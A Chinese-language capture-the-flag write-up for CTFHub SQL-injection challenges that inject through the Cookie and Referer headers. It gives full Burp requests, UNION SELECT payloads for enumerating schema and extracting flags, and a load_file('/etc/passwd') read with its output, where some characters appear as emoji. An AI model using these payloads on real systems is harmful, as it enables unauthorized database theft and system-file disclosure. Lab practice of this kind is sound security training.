Cookie注入
工具:burp suite
这次的输入点变了。尝试找找Cookie吧
select * from news where id=1
ID: 1
Data: ctfhub
GET / HTTP/1.1
Host: challenge-01b55e9bf85f0710.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select version(),database();
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database();
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name="bnuisrgwep";
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1, group_concat(mupbzaevry) from sqli.bnuisrgwep;
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
MySQL结构
ID
select * from news where id=-1 union select version(),database()
ID: 10.3.22-MariaDB-0+deb10u1
Data: sqli
- 求库名
select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'--
ID: 1
Data: ttrdbwiill,news
- 求表名
select * from news where id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='ttrdbwiill'
- 求列名
ID: 1
Data: gdbhmtwwza
select * from news where id=-1 union select 1,group_concat(gdbhmtwwza )from sqli.ttrdbwiill
ID: 1
Data: ctfhub{c6039bafb52839c4e0fb47d9}
其他:
select * from news where id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
ID: 1
Data: information_schema,mysql,performance_schema,sqli
select * from news where id=-2 union select 1,load_file('/etc/passwd')
ID: 1
Data: root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/usr/sbin/nologin mysql❌101:101:MySQL Server,:/nonexistent:/bin/false
Refer注入
-
求数据库名
请在referer输入ID
select * from news where id=-1 union select 1,database()
ID: 1
Data: sqli
-
求数据表
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’
ID: 1
Data: news,nvtycnwnmh
-
求列名
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘nvtycnwnmh’
ID: 1
Data: xrfwvedani
-
找flag
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(xrfwvedani) from nvtycnwnmh
ID: 1
Data: ctfhub{48eb7eee2b8ca6bae5fe6893}